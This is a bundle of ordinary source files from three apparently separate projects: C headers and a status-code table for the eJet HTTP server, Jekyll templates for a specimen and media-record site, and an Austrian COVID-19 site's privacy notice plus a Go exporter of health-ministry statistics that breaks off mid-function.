/* HTTP Cache storage system includes raw files and cache information file.
raw files are actual origin server files cached in local storage in Web Server.
cache information file is accompanied by the raw file. its name is extended from
raw file with .cache. each raw file directory must have a cache directory with hiding
attribute and all cache information files are saved here. */
/* cache facilities:
Expires: Wed, 21 Oct 2020 07:28:00 GMT (Response Header)
Cache-Control: max-age=73202 (Response Header)
Cache-Control: public, max-age=73202 (Response Header)
Last-Modified: Mon, 18 Dec 2019 12:35:00 GMT (Response Header)
If-Modified-Since: Fri, 05 Jul 2019 02:14:23 GMT (Request Header)
ETag: 627Af087-27C8-32A9E7B10F (Response Header)
If-None-Match: 627Af087-27C8-32A9E7B10F (Request Header)
*/
/* 96 bytes header of cache information file */
typedef struct cache_info_s {
CRITICAL_SECTION cacheCS;
char * cache_file;
char * cache_tmp;
char * info_file;
void * hinfo;
uint32 mimeid;
uint8 body_flag;
int header_length;
int64 body_length;
int64 body_rcvlen;
/* Cache-Control: max-age=0, private, must-revalidate
Cache-Control: max-age=7200, public
Cache-Control: no-cache */
uint8 directive; //0-max-age 1-no cache 2-no store
uint8 revalidate; //0-none 1-must-revalidate
uint8 pubattr; //0-unknonw 1-public 2-private(only browser cache)
time_t ctime;
time_t expire;
int maxage;
time_t mtime;
char etag[36];
FragPack * frag;
int count;
void * httpmgmt;
} CacheInfo;
void * cache_info_alloc ();
void cache_info_free (void * vcacinfo);
int cache_info_zero (void * vcacinfo);
int64 cache_info_body_length (void * vcacinfo);
int cache_info_read (void * vcacinfo);
int cache_info_write_meta (void * vcacinfo);
int cache_info_write_frag (void * vcacinfo);
int cache_info_write (void * vcacinfo);
int cache_info_add_frag (void * vcacinfo, int64 pos, int64 len, int complete);
int cache_info_verify (void * vcacinfo);
int http_request_cache_init (void * vmsg);
int http_response_cache_init (void * vmsg);
int http_request_in_cache (void * vmsg);
int http_proxy_cache_open (void * vmsg);
int http_proxy_cache_parse (void * vmsg, void * vclimsg, int * resend);
int http_proxy_cache_complete (void * vmsg);
int http_cache_response_header (void * vmsg, void * vcacinfo);
int http_cache_info_init (void * vmgmt);
int http_cache_info_clean (void * vmgmt);
void * cache_info_open (void * vmgmt, char * cacfile);
void * cache_info_create (void * vmgmt, char * cacfile, int64 fsize);
void cache_info_close (void * vcacinfo);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_request.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_REQUEST_H_
#define _HTTP_REQUEST_H_
#include "http_header.h"
#ifdef __cplusplus
extern "C" {
#endif
/* cookie management */
int http_req_addcookie (void * vmsg, char * name, int namelen,
char * value, int valuelen);
int http_req_delallcookie (void * vmsg);
HeaderUnit * http_req_getcookie (void * vmsg, char * name, int namelen);
int http_req_parse_cookie (void * vmsg);
/* Request-Line = Method SP Request-URI SP HTTP-Version CRLF */
int http_req_reqline_decode (void * vmsg, char * pline, int linelen);
int http_req_reqline_encode (char * meth, int methlen, char * uri,
int urilen, char * ver, int verlen, frame_p frame);
int http_req_set_reqmeth (void * vmsg, char * meth, int methlen);
int http_req_set_absuri (void * vmsg);
int http_req_set_docuri (void * vmsg, char * puri, int urilen, int decode, int instbrk);
/* resolve the uri to break down into all fields */
int http_req_set_uri (void * vmsg, char * puri, int urilen, int decode);
int http_partial_parse (void * vmsg, void * vbgn, int len);
int http_req_parse_header (void * vmsg);
int http_req_verify (void * vmsg);
int http_req_encoding (void * vmsg, int encode);
int print_request (void * vmsg, FILE * fp);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_status.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_status.h"
#include "http_mgmt.h"
typedef struct status_code_ {
int httpcode;
char * desc;
} HTTPStatusCode;
static HTTPStatusCode g_httpstatuscode[] = {
{ 100, "Continue"},
{ 101, "Switching Protocols"},
{ 200, "OK, Success"},
{ 201, "Created"},
{ 202, "Accepted"},
{ 203, "Non-Authoritative Information"},
{ 204, "No Content"},
{ 205, "Reset Content"},
{ 206, "Partial Content"},
{ 300, "Multiple Choices"},
{ 301, "Moved Permanently"},
{ 302, "Moved temporarily"},
{ 303, "See Other"},
{ 304, "Not modified"},
{ 305, "Use Proxy"},
{ 306, "reserved"},
{ 307, "Temporary Redirect"},
{ 400, "Bad Request - server could not understand request"},
{ 401, "Unauthorized"},
{ 402, "Payment required"},
{ 403, "Forbidden - operation is understood but refused"},
{ 404, "Not Found"},
{ 405, "Method not allowed"},
{ 406, "Not Acceptable"},
{ 407, "Proxy Authentication required"},
{ 408, "Request Timeout"},
{ 409, "Conflict"},
{ 410, "Gone"},
{ 411, "Length Required"},
{ 412, "Precondition failed"},
{ 413, "Request entity too large"},
{ 414, "Request-URL too large"},
{ 415, "Unsupported media type"},
{ 416, "Requested Range Not Satisfiable"},
{ 417, "Expectation Failed"},
{ 500, "Internal Server Error"},
{ 501, "Not Implemented"},
{ 502, "Bad Gateway"},
{ 503, "Service Unavailable"},
{ 504, "Gateway Timeout"},
{ 505, "HTTP version not supported"}
};
static ulong http_status_hash_func (void * vkey)
{
int httpcode = 0;
ulong codeval = 0;
if (!vkey) return 0;
httpcode = *(int *)vkey;
if (httpcode < 100) {
} else if (httpcode < 500 && httpcode >= 100) {
codeval = (httpcode/100 - 1) * 10 + httpcode % 100;
} else if (httpcode >= 500) {
codeval = (httpcode/100 + 1) * 10 + httpcode % 100;
}
return codeval;
}
static int http_status_cmp_key (void * a, void * b)
{
HTTPStatusCode * scode = (HTTPStatusCode *)a;
int httpcode = *(int *)b;
return scode->httpcode - httpcode;
}
int http_status_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPStatusCode * scode = NULL;
int i, num = 0;
if (!mgmt) return -1;
if (!mgmt->status_table) {
mgmt->status_table = ht_new(80, http_status_cmp_key);
ht_set_hash_func (mgmt->status_table, http_status_hash_func);
}
num = sizeof(g_httpstatuscode)/sizeof(g_httpstatuscode[0]);
for (i=0; i<num; i++) {
scode = (HTTPStatusCode *)&g_httpstatuscode[i];
ht_set(mgmt->status_table, &scode->httpcode, scode);
}
tolog(1, "eJet - HTTP Status table init.\n");
return 0;
}
int http_status_cleanup (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
ht_free(mgmt->status_table);
mgmt->status_table = NULL;
tolog(1, "eJet - HTTP Status table cleaned.\n");
return 0;
}
int http_get_status (void * vmgmt, char * status, int statuslen, char ** preason)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPStatusCode * scode = NULL;
int httpcode = 0;
int i = 0;
if (!mgmt) return -1;
if (!status || statuslen <= 0) return -2;
while(*status==' ' || *status=='\t') {status++; statuslen--;}
for(i=0; i<statuslen && isdigit(status[i]); i++) {
httpcode *= 10;
httpcode += status[i] - '0';
}
scode = (HTTPStatusCode *) ht_get(mgmt->status_table, &httpcode);
if (!scode) return -100;
if (preason) *preason = scode->desc;
return 0;
}
int http_get_status2 (void * vmgmt, int status, char ** preason)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPStatusCode * scode = NULL;
if (!mgmt) return -1;
scode = (HTTPStatusCode *) ht_get(mgmt->status_table, &status);
if (!scode) return -100;
if (preason) *preason = scode->desc;
return 0;
}
<|start_filename|>include/http_mgmt.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_MGMT_H_
#define _HTTP_MGMT_H_
#include "http_listen.h"
#ifdef __cplusplus
extern "C" {
#endif
/* HTTP module role definition */
#define HTTP_SERVER 0x01
#define HTTP_CLIENT 0x02
#define HTTP_PROXY 0x04
#define HTTP_GATEWAY 0x08
typedef int HTTPObjInit (void * httpmgmt, void * vobj, void * hconf);
typedef int HTTPObjClean (void * vobj);
extern char * g_http_version;
extern char * g_http_build;
extern char * g_http_author;
typedef struct http_mgmt_ {
char * uri_unescape_char; /* uri not escaped character list using percent encoding */
char * cookie_file;
int conn_check_interval;
int srv_check_interval;
int cli_max_header_size;
uint8 cli_body_cache;
int cli_body_cache_threshold;
int cli_keepalive_time; /* after one/more requests handled, keep connection */
int cli_conn_idle_time; /* connection accepted, but no request bytes recv */
int cli_header_idletime; /* after recv partial header, max time not got followed bytes */
int cli_header_time; /* max time got one complete header */
int cli_request_handle_time; /* max time request arrived and handled */
int srv_max_header_size;
int srv_connecting_time; /* max time that builds TCP connection to remote server */
int srv_keepalive_time; /* keep the connection alive waiting for the new httpmsg */
int srv_conn_idle_time; /* max time handling HTTPMsg, in sending or waiting resp */
char * srv_con_cert; /* cert needed when issuing HTTP request to origin over SSL con */
char * srv_con_prikey; /* private key needed when issuing HTTP request over SSL con */
char * srv_con_cacert; /* CA cert when client authentication needed */
char * srv_resp_root;
uint8 srv_resp_cache;
char * srv_resp_cache_file;
uint8 proxy_tunnel; /* when acting as proxy, CONNECT method is suported or not */
int tunnel_keepalive_time; /* max idle time there is no sending/receiving on the connection */
uint8 auto_redirect; /* 301/302 from origin is redirected or not by web server */
int proxy_buffer_size; /* max size of data piled up in sending buffer to client */
int fcgi_keepalive_time; /* FCGI TCP connection is kept alive waiting for new FcgiMsg */
int fcgi_connecting_time; /* allowed max time to build TCP connection to FCGI Server */
int fcgi_conn_idle_time; /* max time handling one FcgiMsg, in sending or waiting resp */
int fcgi_srv_alive_time; /* FCGI Server Instance is kept alive waiting for new FcgiCon */
int fcgi_buffer_size; /* max size of data piled up in sending buffer to client */
void * cnfjson;
char root_path[256];
char httpver0[12];
char httpver1[12];
int header_num;
char useragent[256];
uint32 uri_bitmask[8];
int addrnum;
AddrItem localaddr[6];
char uploadso[33];
char uploadvar[33];
char shellcmdso[33];
char shellcmdvar[33];
time_t inlaststamp;
char inipaddr[41];
void * variable;
int varnum;
int varsize;
hashtab_t * var_table;
void * source_proxy_mgmt;
void * host_proxy_mgmt;
void * httplog;
ulong conid;
CRITICAL_SECTION conCS;
hashtab_t * con_table;
ulong srvid;
CRITICAL_SECTION srvCS;
rbtree_t * srv_tree;
void * srv_sslctx;
ulong msgid;
CRITICAL_SECTION msgidCS;
int msgextsize;
CRITICAL_SECTION msgtableCS;
hashtab_t * msg_table;
CRITICAL_SECTION fcgisrvCS;
hashtab_t * fcgisrv_table;
void * cachemgmt;
void * cookiemgmt;
CRITICAL_SECTION cacinfoCS;
hashtab_t * cacinfo_table;
bpool_t * con_pool;
bpool_t * srv_pool;
bpool_t * msg_pool;
bpool_t * header_unit_pool;
bpool_t * frame_pool;
mpool_t * fcgisrv_pool;
mpool_t * fcgicon_pool;
mpool_t * fcgimsg_pool;
hashtab_t * status_table;
/* HTTPListen instances list */
CRITICAL_SECTION listenlistCS;
arr_t * listen_list;
/* matching next proxy host and port when sending request */
arr_t * sndpxy_list;
/* default MIME table */
void * mimemgmt;
uint8 mimemgmt_alloc;
void * appmime;
HTTPCBHandler * req_handler;
void * req_cbobj;
HTTPCBHandler * req_check;
void * req_checkobj;
HTTPCBHandler * res_check;
void * res_checkobj;
void * xmlmgmt;
void * pcore;
CRITICAL_SECTION countCS;
struct timeval count_tick;
uint64 total_recv;
uint64 total_sent;
/* reserved extra object for application */
HTTPObjInit * objinit;
void * hobjconf;
HTTPObjClean * objclean;
uint8 extdata[1];
} HTTPMgmt;
int http_mgmt_get_conf (void * vmgmt);
void * http_mgmt_alloc (void * epump, char * jsonconf, int extsize, int msgextsize);
int http_mgmt_init (void * vmgmt);
int http_mgmt_cleanup (void * vmgmt);
int http_mgmt_obj_init (void * vmgmt, HTTPObjInit * objinit, void * hconf);
int http_mgmt_obj_clean (void * vmgmt, HTTPObjClean * objclean);
void * http_mgmt_obj (void * vmgmt);
void http_overhead (void * vmgmt, uint64 * recv, uint64 * sent,
struct timeval * lasttick, int reset, struct timeval * curt);
void http_overhead_sent (void * vmgmt, long sent);
void http_overhead_recv (void * vmgmt, long recv);
int http_listen_check (void * vmgmt, void * vobj, int event, int fdtype);
void http_uri_escape_init (void * vmgmt);
int http_set_reqhandler (void * vmgmt, HTTPCBHandler * reqhandler, void * cbobj);
int http_set_reqcheck (void * vmgmt, HTTPCBHandler * reqcheck, void * checkobj);
int http_set_rescheck (void * vmgmt, HTTPCBHandler * rescheck, void * checkobj);
int http_mgmt_con_add (void * vmgmt, void * vcon);
void * http_mgmt_con_get (void * vmgmt, ulong conid);
void * http_mgmt_con_del (void * vmgmt, ulong conid);
int http_mgmt_con_num (void * vmgmt);
void * http_msg_fetch (void * vmgmt);
int http_msg_num (void * vmgmt);
void * http_get_json_conf (void * vmgmt);
void * http_get_mimemgmt (void * vmgmt);
void * http_get_frame_pool (void * vmgmt);
void * http_get_epump (void * vmgmt);
int http_set_epump (void * vmgmt, void * pcore);
char * http_get_mime (void * vmgmt, char * file, uint32 * mimeid);
int http_conf_mime_init (void * vmgmt);
int http_conf_mime_clean (void * vmgmt);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_form.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FORM_H_
#define _HTTP_FORM_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct HTTPForm_ {
char * name; //allocated, need free
char * ctype; //allocated, need free
uint8 formtype; //0-form data 1-file
char * filename; //allocated, need free
char * basename; //allocated, need free
char * extname;
int64 valuepos;
int64 valuelen;
chunk_t * body_chunk;
uint8 filecache;
} HTTPForm, http_form_t;
void * http_form_alloc();
void http_form_free (void * vform);
void * http_form_node (void * vmsg, char * key);
int http_form_get (void * vmsg, char * key, char ** ctype, uint8 * formtype, char ** fname, int64 * valuelen);
int http_form_value (void * vmsg, char * key, char * value, int64 valuelen);
int http_form_valuep (void * vmsg, char * key, int64 pos, char ** pvalue, int64 * valuelen);
int http_form_tofile (void * vmsg, char * key, int filefd);
int http_form_multipart_parse (void * vmsg, arr_t * formlist);
typedef struct FormDataNode_ {
void * res[2];
char * pval; //Content-Disposition: form-data; name="TUploadFile"; filename="F:\tmp\onebyte.txt"
int valuelen;
char * pbody; //file content or form-var data
int bodylen;
int bodypos; //if filecache, gives the offset
char bodycont[512]; //if filecache, store the body content
char conttype[64]; // form data content type
int typelen;
uint8 filecache; //0-memory 1-file cache
char filecachename[128]; //multipart-form content file name
uint8 fileflag; //0-form data 1-file content
char var[128]; //variable name
char filename[128];
char basename[128];
char extname[32];
char path[128]; //httpdoc real path of the request file
} FormDataNode;
int ParseReqMultipartForm (void * vmsg, arr_t * formdatalist);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_fcgi_io.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FCGI_IO_H_
#define _HTTP_FCGI_IO_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_fcgicon_crash_handle (void * vcon);
int http_fcgi_send_probe (void * vcon);
int http_fcgi_send (void * vcon);
int http_fcgi_send_final (void * vmsg);
int http_fcgi_recv (void * vcon);
int http_fcgi_recv_parse (void * vcon);
int http_fcgi_recv_forward (void * vcon);
int http_fcgi_handle (void * vmsg);
int http_fcgi_check (void * vmsg, void * purl, int urlen);
void * http_fcgi_send_start (void * vfcgisrv, void * vhttpmsg);
int http_fcgi_srv_send (void * vfcgicon, void * vfcgimsg);
int http_fcgi_con_lifecheck (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
| kehengzhong/ejet |
<|start_filename|>_layouts/mediarecord.html<|end_filename|>
---
layout: default
---
<div class="mediarecord" style="display: flex">
{% assign mediarecord = page.idigbio %}
{% include media.html mediarecord=mediarecord %}
</div>
<|start_filename|>data.json<|end_filename|>
---
---
{%- assign records = site.pages -%}
{%- for page in records -%}
{% assign layout = page.layout %}
{%- case layout -%}
{%- when "occurrence" -%}
{{ page.gbif | jsonify | strip_newlines }}
{{ "" }}
{%- when "record" -%}
{{ page.idigbio | jsonify | strip_newlines }}
{{ "" }}
{%- when "mediarecord" -%}
{{ page.idigbio | jsonify | strip_newlines }}
{{ "" }}
{%- endcase -%}
{%- endfor -%}
<|start_filename|>_includes/media.html<|end_filename|>
<div style="display: flex; flex-direction: column; border: solid; border-style: top;">
Media Record
<div style="display: flex;">
<a href="{{ include.mediarecord.uuid }}">{%- include uuid.html url=site.url uuid=include.mediarecord.uuid -%}</a>
</div>
<div style="display: flex;">
<a href="{{ include.mediarecord.uuid | prepend: "https://www.idigbio.org/portal/mediarecords/" }}">{%- include uuid.html url="idigbio.org" uuid=include.mediarecord.uuid -%}</a>
</div>
<div style="display: flex; justify-content: space-evenly;">
<div>
{% assign fullsize_url_online = include.mediarecord.uuid | prepend: "https://api.idigbio.org/v2/media/" | append: "?size=fullsize" %}
{% include media_frag.html origin=fullsize_url_online %}
</div>
<div>
{% assign original_online = include.mediarecord.data["ac:accessURI"] %}
{% include media_frag.html origin=original_online %}
</div>
</div>
<div id="{{ include.mediarecord.data | jsonify | uri_escape }}" class="meta"></div>
</div>
<|start_filename|>_includes/record.html<|end_filename|>
<div style="display: flex; flex-direction: row; border: solid;">
<div style="display: flex; flex-direction: column; border: solid;">
<div>Specimen Record</div>
<div><a href="{{ include.record.idigbio.uuid }}">{%- include uuid.html url=site.url uuid=include.record.idigbio.uuid -%}</a></div>
<div>
<a href="{{ include.record.idigbio.uuid | prepend: "https://www.idigbio.org/portal/records/" }}">{%- include uuid.html url="idigbio.org" uuid=include.record.idigbio.uuid -%}</a>
</div>
<div id="{{ include.record.idigbio.data | jsonify | uri_escape }}" class="meta"></div>
</div>
<div>
{%- for uuid in include.record.idigbio.indexTerms.mediarecords -%}
{%- assign mediarecord = site.pages | where: "id", uuid | first -%}
{% include media.html mediarecord=mediarecord.idigbio %}
{%- endfor -%}
</div>
</div>
<|start_filename|>_includes/occurrence.html<|end_filename|>
<div style="display: flex; flex-direction: row; border: solid;">
<div style="display: flex; flex-direction: column; border: solid;">
<div>Occurrence</div>
<div><a href="{{ include.occurrence.gbif.key }}">{%- include key.html url=site.url key=include.occurrence.gbif.key -%}</a></div>
<div>
<a href="{{ include.occurrence.gbif.key | prepend: "https://www.gbif.org/occurrence/" }}">{%- include key.html url="gbif.org" key=include.occurrence.gbif.key -%}</a>
</div>
<div id="{{ include.occurrence.gbif | jsonify | uri_escape }}" class="meta"></div>
</div>
{%- assign media_gbif_list = include.occurrence.gbif.media | where: "type", "StillImage" -%}
{%- for media_gbif in media_gbif_list -%}
{% include media_gbif.html media_gbif=media_gbif %}
{%- endfor -%}
</div>
<|start_filename|>registry.json<|end_filename|>
---
---
{%- assign versions = site.data.content -%}
{%- for version in versions -%}
{{ version.url }}
{{ version | jsonify | strip_newlines }}
{%- endfor -%}
<|start_filename|>_includes/local_hash_for.html<|end_filename|>
{%- assign content_for_url = site.data.content | where: "url", include.url | first -%}
{%- include local_url_for_hash.html hash=content_for_url.hash location=site.data.preston.data_location -%}
<|start_filename|>_includes/local_url_for_hash.html<|end_filename|>
{%- assign hash = include.hash | remove: "hash://sha256/" -%}
{%- assign location = include.location | remove: "hash://sha256/" -%}
{%- assign hash_first2 = hash | slice: 0,2 -%}
{%- assign hash_second2 = hash | slice: 2,2 -%}
{%- assign local_url = hash | prepend: "/" | prepend: hash_second2 | prepend: "/" | prepend: hash_first2 | prepend: location %}
{{ local_url }}
<|start_filename|>_includes/uuid.html<|end_filename|>
{%- assign hostname = include.url | split: "://" | reverse | first | split: "/" | first | split: ':' | first -%}
urn:uuid:{{ include.uuid }}@{{ hostname }}
<|start_filename|>_includes/key.html<|end_filename|>
{%- assign hostname = include.url | split: "://" | reverse | first | split: "/" | first | split: ':' | first -%}
gbif:occurrence:{{ include.key }}@{{ hostname }}
<|start_filename|>_includes/media_gbif.html<|end_filename|>
<div style="display: flex; flex-direction: column; border: solid; border-style: top;">
Media
<div style="display: flex; justify-content: space-evenly;">
<div>
{% assign original_online = include.media_gbif.identifier %}
{% include media_frag.html origin=original_online %}
</div>
</div>
<div id="{{ include.media_gbif | jsonify | uri_escape }}" class="meta"></div>
</div>
| jhpoelen/bats |
<|start_filename|>impressum.html<|end_filename|>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Impressum & Datenschutz</title>
<style>
body {
background: #161719;
font-family: "Courier New", Courier, monospace;
color: orange;
margin: 6em;
}
a {
color: chartreuse;
}
a:hover {
color: #00f2c3;
}
h1,h2,h3,h4 {
color: yellow;
}
</style>
</head>
<body>
<h1>Impressum</h1>
<h2><a href="https://covid19.spiessknafl.at">https://covid19.spiessknafl.at</a></h2>
<h2>Erklärung zur Informationspflicht / Datenschutzerklärung</h2>
<p>
Der Schutz Ihrer persönlichen Daten ist uns ein besonderes Anliegen. Wir verarbeiten Ihre Daten daher ausschließlich auf Grundlage der gesetzlichen Bestimmungen (DSGVO, TKG 2003) und nur im absolut notwendigen Rahmen.
</p>
<h4>Kontakt mit uns</h4>
<p>
Wenn Sie per E-Mail Kontakt mit uns aufnehmen, werden Ihre angegebenen Daten zwecks Bearbeitung der Anfrage und für den Fall von Anschlussfragen sechs Monate bei uns gespeichert. Diese Daten geben wir nicht ohne Ihre Einwilligung weiter.
</p>
<h4>Nutztungsaufzeichnung</h4>
<p>
Wir verwenden <strong>keinen</strong> externen Webanalysedienst und es werden <strong>keine</strong> Cookies auf Ihrem Rechner gespeichert. Wir behalten uns vor, anonymisierte Aufrufstatistiken zu Analyse der Webseitenperformance auf unseren Servern zu speichern (die Verarbeitung ergibt sich aus Art. 6 DSGVO). Auch diese werden nach maximal 6 Monaten gelöscht.
</p>
<h4>Ihre Rechte</h4>
<p>
Ihnen stehen bezüglich Ihrer bei uns gespeicherten Daten grundsätzlich die Rechte auf Auskunft, Berichtigung, Löschung, Einschränkung, Datenübertragbarkeit, Widerruf und Widerspruch zu. Wenn Sie glauben, dass die Verarbeitung Ihrer Daten gegen das Datenschutzrecht verstößt oder Ihre datenschutzrechtlichen Ansprüche sonst in einer Weise verletzt worden sind, können Sie sich bei der im Impressum angegebenen E-Mail-Adresse oder der Datenschutzbehörde beschweren.
</p>
<h3>Kontakt</h3>
<NAME><br>
<ul>
<li><a href="https://spiessknafl.at/peter/">https://spiessknafl.at/peter/</a></li>
<li><a href="https://covid19.spiessknafl.at">https://covid19.spiessknafl.at</a></li>
<li><a href="https://github.com/cinemast/covid19-at">https://github.com/cinemast/covid19-at</a> (Bug tracker und Source Code)</li>
</ul>
dev<!-- <EMAIL> -->@spi<!--
-->ess<!-- <div>O_o 📧</div> -->knaf<!---->l.<!-- // /*@mail@*/ -->a<!--
<EMAIL>.<EMAIL>
-->t<br>
</body>
</html>
<|start_filename|>healthministry.go<|end_filename|>
package main
import (
"encoding/json"
"fmt"
)
type healthMinistryExporter struct {
mp *metadataProvider
url string
}
type ministryStat []struct {
Label string
Y uint64
Z uint64
}
func newHealthMinistryExporter() *healthMinistryExporter {
return &healthMinistryExporter{mp: newMetadataProviderWithFilename("bezirke.csv"), url: "https://info.gesundheitsministerium.at/data"}
}
func checkTags(result metrics, field string) []error {
errors := make([]error, 0)
for _, s := range result {
if len(*s.Tags) != 4 {
errors = append(errors, fmt.Errorf("Missing tags for: %s", (*s.Tags)[field]))
}
}
return errors
}
func (h *healthMinistryExporter) GetMetrics() (metrics, error) {
metrics := make(metrics, 0)
result, _ := h.getSimpleData()
metrics = append(metrics, result...)
result, err := h.getAgeMetrics()
metrics = append(metrics, result...)
result, err = h.getGeschlechtsVerteilung()
metrics = append(metrics, result...)
result, err = h.getBundeslandInfections()
metrics = append(metrics, result...)
result, err = h.getBezirke()
metrics = append(metrics, result...)
result, err = h.getBundeslandHealedDeaths()
metrics = append(metrics, result...)
return metrics, err
}
func (h *healthMinistryExporter) Health() []error {
errors := make([]error, 0)
result, err := h.getBezirke()
if err != nil {
errors = append(errors, err)
}
if len(result) < 10 {
errors = append(errors, fmt.Errorf("Not enough Bezirke Results: %d", len(result)))
}
errors = append(errors, checkTags(result, "bezirk")...)
result, err = h.getBundeslandInfections()
if err != nil {
errors = append(errors, err)
}
if len(result) != 27 {
errors = append(errors, fmt.Errorf("Missing Bundesland result %d", len(result)))
}
errors = append(errors, checkTags(result, "province")...)
result, err = h.getAgeMetrics()
if err != nil {
errors = append(errors, err)
}
if len(result) < 4 {
errors = append(errors, fmt.Errorf("Missing age metrics"))
}
result, err = h.getGeschlechtsVerteilung()
if err != nil {
errors = append(errors, err)
}
if len(result) != 2 {
errors = append(errors, fmt.Errorf("Geschlechtsverteilung failed"))
}
result, err2 := h.getSimpleData()
errors = append(errors, err2...)
if len(result) < 3 {
errors = append(errors, fmt.Errorf("Could not find \"Bestätigte Fälle\""))
}
return errors
}
func (h *healthMinistryExporter) getTags(location string, fieldName string, data *metaData) *map[string]string {
if data != nil {
return &map[string]string{fieldName: location, "country": "Austria", "longitude": ftos(data.location.long), "latitude": ftos(data.location.lat)}
}
return &map[string]string{fieldName: location, "country": "Austria"}
}
func (h *healthMinistryExporter) getBezirke() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Bezirke.js")
if err != nil {
return nil, err
}
bezirkeStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &bezirkeStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range bezirkeStats {
data := h.mp.getMetadata(s.Label)
tags := h.getTags(s.Label, "bezirk", data)
result = append(result, metric{"cov19_bezirk_infected", tags, float64(s.Y)})
if data != nil {
result = append(result, metric{"cov19_bezirk_infected_100k", tags, float64(infection100k(s.Y, data.population))})
}
}
return result, nil
}
func (h *healthMinistryExporter) getBezirkStat() ([]bezirkStat, error) {
arrayString, err := readArrayFromGet(h.url + "/Bezirke.js")
if err != nil {
return nil, err
}
bezirkeStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &bezirkeStats)
if err != nil {
return nil, err
}
result := make([]bezirkStat, 0)
for _, s := range bezirkeStats {
data := h.mp.getMetadata(s.Label)
result = append(result, bezirkStat{s.Label, apiLocaiton{Lat: data.location.lat, Long: data.location.long}, data.population, s.Y})
}
return result, nil
}
func mapBundeslandLabel(label string) string {
switch label {
case "Ktn":
return "Kärnten"
case "NÖ":
return "Niederösterreich"
case "OÖ":
return "Oberösterreich"
case "Sbg":
return "Salzburg"
case "Stmk":
return "Steiermark"
case "T":
return "Tirol"
case "V":
return "Vorarlberg"
case "W":
return "Wien"
case "Bgld":
return "Burgenland"
}
return "unknown"
}
func (h *healthMinistryExporter) getBundeslandInfections() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Bundesland.js")
if err != nil {
return nil, err
}
provinceStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &provinceStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range provinceStats {
s.Label = mapBundeslandLabel(s.Label)
data := h.mp.getMetadata(s.Label)
tags := h.getTags(s.Label, "province", data)
result = append(result, metric{"cov19_detail", tags, float64(s.Y)})
if data != nil {
result = append(result, metric{"cov19_detail_infected_per_100k", tags, float64(infection100k(s.Y, data.population))})
result = append(result, metric{"cov19_detail_infection_rate", tags, float64(infectionRate(s.Y, data.population))})
}
}
return result, nil
}
func (h *healthMinistryExporter) getBundeslandHealedDeaths() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/GenesenTodesFaelleBL.js")
if err != nil {
return nil, err
}
provinceStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &provinceStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range provinceStats {
data := h.mp.getMetadata(s.Label)
tags := h.getTags(s.Label, "province", data)
result = append(result, metric{"cov19_detail_healed", tags, float64(s.Y)})
result = append(result, metric{"cov19_detail_dead", tags, float64(s.Z)})
}
return result, nil
}
func (h *healthMinistryExporter) getAgeStat() (map[string]uint64, error) {
arrayString, err := readArrayFromGet(h.url + "/Altersverteilung.js")
if err != nil {
return nil, err
}
ageStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &ageStats)
if err != nil {
return nil, err
}
result := make(map[string]uint64)
for _, s := range ageStats {
result[s.Label] = s.Y
}
return result, nil
}
func (h *healthMinistryExporter) getAgeMetrics() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Altersverteilung.js")
if err != nil {
return nil, err
}
ageStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &ageStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range ageStats {
tags := &map[string]string{"country": "Austria", "group": s.Label}
result = append(result, metric{"cov19_age_distribution", tags, float64(s.Y)})
}
return result, nil
}
func (h *healthMinistryExporter) getGeschlechtsVerteilung() (metrics, error) {
arrayString, err := readArrayFromGet(h.url + "/Geschlechtsverteilung.js")
if err != nil {
return nil, err
}
ageStats := ministryStat{}
err = json.Unmarshal([]byte(arrayString), &ageStats)
if err != nil {
return nil, err
}
result := make(metrics, 0)
for _, s := range ageStats {
tags := &map[string]string{"country": "Austria", "sex": s.Label}
result = append(result, metric{"cov19_sex_distribution", tags, float64(s.Y)})
}
return result, nil
}
func addVarIfValid(errors []error, result metrics, url string, varName string, metricName string) ([]error, metrics) {
value, err := readJsVarFromGet(url, varName)
if err != nil {
errors = append(errors, err)
} else {
result = append(result, metric{metricName, nil, atof(value)})
}
return errors, result
}
func (h *healthMinistryExporter) getSimpleData() (metrics, []error) {
errors := make([]error, 0)
result := make(metrics, 0)
